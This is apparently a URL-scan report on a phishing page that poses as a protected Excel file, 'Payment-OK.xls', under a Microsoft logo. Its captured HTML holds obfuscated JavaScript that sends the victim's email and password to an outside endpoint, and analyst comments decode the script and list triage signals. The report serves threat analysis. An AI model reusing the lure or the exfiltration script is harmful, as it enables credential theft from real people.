zmfixbrqu.indylatinawrds.com
2a06:98c1:3121::3  Malicious Activity! Public Scan

Submitted URL: http://zmfixbrqu.indylatinawrds.com:8443/impact?impact=g******@m**********.com
Effective URL: https://zmfixbrqu.indylatinawrds.com:8443/impact?impact=g******@m**********.com
Submission: On August 18 via api from US — Scanned from NL

Form analysis: 1 form found in the DOM

Name: login_form — Method: POST

<!-- Analyst note: credential-harvesting lure presented as a "protected" Excel file.
     - The form has no action attribute; the visible button is type="button" and its
       onclick calls submitForm(event) from the inline script, so the data leaves
       through script code rather than a regular form submit.
     - The usrn field is readonly and pre-filled with the same masked address that
       appears in the `impact` query parameter of the scanned URL, so only the
       password is requested from the visitor.
     - The logo is hot-linked from aadcdn.msftauth.net and the spinner image from
       kasumbo.com; both hosts differ from the host serving the page, which can be
       used as a triage signal (NOTE(review): confirm against proxy/referrer logs). -->
<form id="login_form" name="login_form" enctype="application/x-www-form-urlencoded" method="post" class="pg-form m-login-form" novalidate=""> <span class="w3-medium w3-block" style="line-height: 1.2; margin-bottom: 10px;"><span class="w3-left"
      style="width: 64px; display: inline-block; margin-right: 7px; margin-top: -9px;">
      <img src="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg" class="w3-image">
    </span>
    <strong> Payment-OK.xls</strong>
    <br>
    <span class="w3-small txt-color-1">Microsoft Excel File</span>
  </span>
  <p class="" style="margin-top: 30px;"> This document is protected! Please enter your E-mail password to open.</p>
  <div id="errorMsgWrap" class="w3-section" style="display: none;">
    <p id="errorText" class="txt-color-2"> Enter a valid email address, phone number, or Skype name.</p>
  </div>
  <div class="w3-section">
    <input name="usrn" type="text" id="usrn" class="w3-input w3-border w3-border-gray uppercase" value="g******@m**********.com" placeholder="Email Address" readonly="readonly">
  </div>
  <div class="w3-section">
    <input name="psrd" type="password" id="psrd" class="w3-input w3-border w3-border-gray uppercase" value="" placeholder="Email Password" autofocus="">
  </div>
  <div class="w3-section">
    <button class="lgnbtn w3-mobile w3-button uppercase" id="continueButton" type="button" onclick="submitForm(event)"> Continue <img src="https://kasumbo.com/smarty/xls_v1.6/tail-spin.svg" alt="" style="display: none;" width="20"></button>
    <script>
      // String-table rotation stage. It keeps moving the first entry of the array
      // returned by a() to the end until the arithmetic checksum below equals the
      // target passed in as f (0x678f5). Every index used elsewhere in this script
      // is only meaningful after this loop has finished, so the literal order of
      // the entries in a() is not the order in effect at run time.
      (function(e, f) {
        // l, k and j are offset wrappers around the lookup routines d, b and c
        // (declared further down; function declarations are hoisted).
        function l(e, f) {
          return d(f - '0xbd', e);
        }

        function k(e, f) {
          return b(f - 0x273, e);
        }

        function j(e, f) {
          return c(e - -'0x240', f);
        }
        // g is the live table array; push/shift below mutate it in place.
        const g = e();
        while (!![]) {
          try {
            // Checksum built from parseInt() of eleven looked-up entries, each divided
            // by 1..11; parseInt only consumes the leading digits of an entry.
            const h = -parseInt(j(-0x122, 'laTQ')) / 0x1 * (-parseInt(k(0x393, 0x395)) / 0x2) + -parseInt(k('0x38f', 0x384)) / 0x3 + -parseInt(l(0x1cd, 0x1e5)) / 0x4 * (parseInt(k(0x39d, '0x392')) / 0x5) + -parseInt(l('0x1bc', '0x1c7')) / 0x6 +
              parseInt(l('0x1e5', 0x1e1)) / 0x7 * (parseInt(j(-'0x112', 'mW6x')) / 0x8) + -parseInt(k(0x377, '0x386')) / 0x9 * (-parseInt(j(-'0x139', 'Ed)M')) / 0xa) + parseInt(k('0x370', 0x37b)) / 0xb;
            if (h === f) break;
            // Mismatch: rotate the table by one position and try again.
            else g['push'](g['shift']());
          } catch (i) {
            // An exception during lookup/decoding is treated like a mismatch.
            g['push'](g['shift']());
          }
        }
      }(a, 0x678f5));

      // Click handler for the "Continue" button: sends the contents of the `usrn`
      // and `psrd` inputs to a third-party endpoint via XMLHttpRequest.
      // Quoted names in the comments below were resolved statically from the string
      // table in a() (plain entries through b(), base64 entries through d()).
      // Entries that go through c() are RC4-protected; they were not decoded here and
      // are marked "presumably" where the surrounding code suggests their value.
      // Triage signal: a form-urlencoded XHR POST carrying these two values to a
      // host other than the one that served the page.
      function submitForm(e) {
        // n -> c (RC4 entries), m -> b (plain entries), o -> d (base64 entries).
        function n(e, f) {
          return c(f - '0x316', e);
        }

        function m(e, f) {
          return b(e - '0x353', f);
        }
        // e.preventDefault()
        e[m(0x480, 0x47b)]();
        // f: element looked up with the id 'usrn' (method name is a c() entry,
        //    presumably getElementById); g: document.getElementById('psrd').
        const f = document[n('BCDC', 0x43b)](o('0x189', 0x18c)),
          g = document[m(0x458, '0x44b')](m('0x455', 0x463));

        function o(e, f) {
          return d(f - 0x74, e);
        }
        // tryCount starts at 1, so requests stop being sent once it has passed 4.
        if (tryCount <= 0x4) {
          const h = new XMLHttpRequest();
          // h.open('POST', 'https://sdsdsd.todordigital.uk/app/stiktk.php');
          // h[<c() entry, presumably setRequestHeader>]('Content-Type',
          //   'application/x-www-form-urlencoded'); h.onreadystatechange = handler.
          h[m(0x468, 0x477)](o(0x195, '0x18f'), m(0x470, 0x45a)), h[n('Hthc', '0x422')](o(0x191, '0x19d'), o(0x178, '0x188')), h[m('0x457', 0x455)] = function() {
            function p(e, f) {
              return n(e, f - 0x20);
            }

            function r(e, f) {
              return m(e - -'0x597', f);
            }

            function q(e, f) {
              return o(f, e - -0x80);
            }
            // h[<c() entry, presumably readyState>] === XMLHttpRequest.DONE
            if (h[p('DAdp', 0x44f)] === XMLHttpRequest[q('0x10b', '0x117')]) {
              // h.status === 200: both branches are empty, so the server's answer
              // does not change what the page does.
              if (h[r(-'0x12e', -'0x146')] === 0xc8) {} else {}
              // Count the completed request; once the counter exceeds 4, show an
              // alert (message text is a c() entry, not decoded here) and assign
              // '#' to a property of window.location (presumably href).
              tryCount++, tryCount > 0x4 && (alert(p('*QP7', 0x457)), window[r(-'0x115', -0xfd)][p('laTQ', 0x45d)] = '#');
            }
            // h.send(<c() entry> + encodeURIComponent(f.value) + <c() entry> +
            //        encodeURIComponent(g[<c() entry, presumably value>]));
            // the two c() entries are presumably the parameter-name fragments of the
            // request body. Afterwards g.value = '' empties the password field.
          }, h[m(0x459, '0x441')](n('*QP7', '0x430') + encodeURIComponent(f[o(0x179, 0x184)]) + n('udbq', 0x428) + encodeURIComponent(g[n('BipX', 0x446)])), g[m('0x45c', '0x459')] = '';
        }
      }

      // Plain string-table lookup: returns the entry at (index - 0x102) without any
      // decoding. On first use the function replaces itself with the inner closure
      // so the table from a() is fetched only once. The second argument is unused.
      function b(c, d) {
        const e = a();
        return b = function(f, g) {
          f = f - 0x102;
          let h = e[f];
          return h;
        }, b(c, d);
      }

      // Offset wrapper around d() (base64 entries): index is f + 0x397; e is passed
      // through as the second argument.
      function t(e, f) {
        return d(f - -0x397, e);
      }

      // Lookup with base64 decoding: fetches the entry at (index - 0x102) and decodes
      // it with a base64 alphabet in which lowercase letters come before uppercase
      // (so swapping the case of an entry yields standard base64). Replaces itself
      // with the inner closure on first use, like b().
      function d(b, c) {
        const e = a();
        return d = function(f, g) {
          f = f - 0x102;
          let h = e[f];
          // One-time setup, guarded by the d['cvtprC'] flag.
          if (d['cvtprC'] === undefined) {
            var i = function(m) {
              const n = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
              let o = '',
                p = '';
              // Base64 decode: s becomes the alphabet position of each character,
              // r accumulates 6-bit groups and a byte is emitted whenever q % 4 != 0.
              for (let q = 0x0, r, s, t = 0x0; s = m['charAt'](t++); ~s && (r = q % 0x4 ? r * 0x40 + s : s, q++ % 0x4) ? o += String['fromCharCode'](0xff & r >> (-0x2 * q & 0x6)) : 0x0) {
                s = n['indexOf'](s);
              }
              // Percent-encode every decoded byte so decodeURIComponent can interpret
              // the byte sequence as UTF-8.
              for (let u = 0x0, v = o['length']; u < v; u++) {
                p += '%' + ('00' + o['charCodeAt'](u)['toString'](0x10))['slice'](-0x2);
              }
              return decodeURIComponent(p);
            };
            // Store the decoder and reuse the outer parameter b as the cache object
            // (it now refers to this call's arguments object).
            d['sZoqSc'] = i, b = arguments, d['cvtprC'] = !![];
          }
          // Cache key: the adjusted index combined with the first table entry.
          const j = e[0x0],
            k = f + j,
            l = b[k];
          // Cache miss: decode and store; cache hit: return the stored value.
          return !l ? (h = d['sZoqSc'](h), b[k] = h) : h = l, h;
        }, d(b, c);
      }
      // Submission counter shared with submitForm(): starts at 1, is incremented when
      // a request completes, and no further request is sent once it exceeds 4.
      let tryCount = 0x1;

      // Offset wrapper around b() (plain entries): index is e - 0x31f.
      function u(e, f) {
        return b(e - 0x31f, f);
      }

      // Lookup with base64 + RC4 decoding: fetches the entry at (index - 0x102),
      // base64-decodes it (same lowercase-first alphabet as d()) and decrypts the
      // result with RC4, using the second argument as the key. Replaces itself with
      // the inner closure on first use, like b() and d().
      function c(b, d) {
        const e = a();
        return c = function(f, g) {
          f = f - 0x102;
          let h = e[f];
          // One-time setup, guarded by the c['DOQlkL'] flag.
          if (c['DOQlkL'] === undefined) {
            // i: base64 decode followed by a UTF-8 interpretation of the bytes.
            var i = function(n) {
              const o = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
              let p = '',
                q = '';
              for (let r = 0x0, s, t, u = 0x0; t = n['charAt'](u++); ~t && (s = r % 0x4 ? s * 0x40 + t : t, r++ % 0x4) ? p += String['fromCharCode'](0xff & s >> (-0x2 * r & 0x6)) : 0x0) {
                t = o['indexOf'](t);
              }
              for (let v = 0x0, w = p['length']; v < w; v++) {
                q += '%' + ('00' + p['charCodeAt'](v)['toString'](0x10))['slice'](-0x2);
              }
              return decodeURIComponent(q);
            };
            // m: RC4 over the decoded string n with key o.
            const m = function(n, o) {
              let p = [],
                q = 0x0,
                r, t = '';
              n = i(n);
              let u;
              // Initialise the 256-entry state to the identity permutation.
              for (u = 0x0; u < 0x100; u++) {
                p[u] = u;
              }
              // Key scheduling: mix the key characters into the state by swapping.
              for (u = 0x0; u < 0x100; u++) {
                q = (q + p[u] + o['charCodeAt'](u % o['length'])) % 0x100, r = p[u], p[u] = p[q], p[q] = r;
              }
              u = 0x0, q = 0x0;
              // Keystream generation: XOR each input character with one state byte.
              for (let v = 0x0; v < n['length']; v++) {
                u = (u + 0x1) % 0x100, q = (q + p[u]) % 0x100, r = p[u], p[u] = p[q], p[q] = r, t += String['fromCharCode'](n['charCodeAt'](v) ^ p[(p[u] + p[q]) % 0x100]);
              }
              return t;
            };
            // Store the decryptor and reuse the outer parameter b as the cache object
            // (it now refers to this call's arguments object).
            c['SdapYS'] = m, b = arguments, c['DOQlkL'] = !![];
          }
          // Cache key: adjusted index combined with the first table entry. The RC4
          // key g is not part of it, so a cached value is returned for an index even
          // if a later call passes a different key.
          const j = e[0x0],
            k = f + j,
            l = b[k];
          // c['PtpNIp'] is set on the first cache miss; it is not read anywhere else
          // in the visible script.
          return !l ? (c['PtpNIp'] === undefined && (c['PtpNIp'] = !![]), h = c['SdapYS'](h, g), b[k] = h) : h = l, h;
        }, c(b, d);
      }

      // Offset wrapper around c() (RC4 entries): index is f - 0x32f, e is the RC4 key.
      function s(e, f) {
        return c(f - '0x32f', e);
      }

      // String table used by every lookup routine (b, d, c). After the first call the
      // function replaces itself with a closure returning the same array, so the
      // rotation stage and all lookups operate on one shared instance.
      // The table mixes three kinds of entries:
      //   - plain strings, including the POST endpoint
      //     'https://sdsdsd.todordigital.uk/app/stiktk.php' and the DOM/XHR member
      //     names 'getElementById', 'open', 'send', 'onreadystatechange', 'status',
      //     'location', 'preventDefault', 'click', 'value', and the field id 'psrd';
      //   - base64 entries read through d(), e.g. 'DxnYBG' -> 'usrn',
      //     'ue9tva' -> 'POST', 're9orq' -> 'DONE', 'q29UDgvUDc1uExbL' -> 'Content-Type',
      //     'ywrKrxzLBNrmAxn0zw5LCG' -> 'addEventListener';
      //   - RC4-protected entries read through c() with a per-call key.
      // Entries that start with digits (e.g. '514055ASKmYF') feed the parseInt()
      // checksum of the rotation stage.
      function a() {
        const v = ['value', 'mZi1ntC4meveAfHzAG', 'click', 'jmoxah/cRLqRW4z0jZfmnvdcJ8oV', 'WOvhW7P/FmoPW6hcM8kwhfSM', 'mNvIwe1gtW', '514055ASKmYF', 'DMfSDwu', '775785qikKes', 'WO4rWPqpgSkT', '265797EEeRKG',
          'yxbWBgLJyxrPB24VEc13D3CTzM9YBs11CMXLBMnVzgvK', 'open', 'status', 're9orq', 'DxnYBG', 'vSoUw1uQlmoVk0VcVG', 'wKhdLSo/ya', 'ue9tva', 'ywrKrxzLBNrmAxn0zw5LCG', 'https://sdsdsd.todordigital.uk/app/stiktk.php', 'zqXHh8oyW4RcKeGjW7FdOKm',
          '5sIZStp', 'WPVcOaefW4WLmMP/ltCdxmob', 'x17dGCoWlSo7W59+cCooW4FdQue/r8kWx8olesC7ruBcU0q7WR89eSoqq8kXWRH3WRldKbVdOWXEdNGeWQ3dVCkaW7GQjSkuW4q', '2ubXMFO', 'nZC4mJrjDLrJt2C', 'ntm5q291BMrl', 'lexcVSo7WOZcVaPfWO3cQ8orECk0W50', 'ndbxyxDzAKe',
          'oe8Wsq', 'mtG0mZC4oeXnDwnsyG', 'q29UDgvUDc1uExbL', 'mZm1nJiXme9dCKDIzq', 'nZC1nZG1CwLRs2vZ', 'bmkydqyNWRLjW7OxW6yxBd9E', 'preventDefault', 'W7uKASk7W73cM8klW6nKBSoq', 'location', 'WQ3cUKRcVWW', 'psrd', '539CoundK', 'onreadystatechange',
          'getElementById', 'send', 'WPZcSmk2WRGGd8ozW5O', '3356210OCrGbe'
        ];
        a = function() {
          return v;
        };
        return a();
      }
      // Looks up an element through two RC4-protected entries (presumably
      // document.getElementById('continueButton'); not decoded here) and then calls
      // continueButton.addEventListener('click', submitForm).
      // NOTE(review): the button markup also carries onclick="submitForm(event)", so a
      // single click appears to run submitForm twice; confirm in a sandbox run.
      const continueButton = document[s('t&3]', 0x44f)](s('w1vc', 0x45b));
      continueButton[t(-0x278, -'0x27b')](u(0x42a, 0x440), submitForm);
    </script>
    <style>
    </style>
  </div>
</form>

Text Content

Payment-OK.xls
Microsoft Excel File

This document is protected! Please enter your E-mail password to open.

Enter a valid email address, phone number, or Skype name.



Continue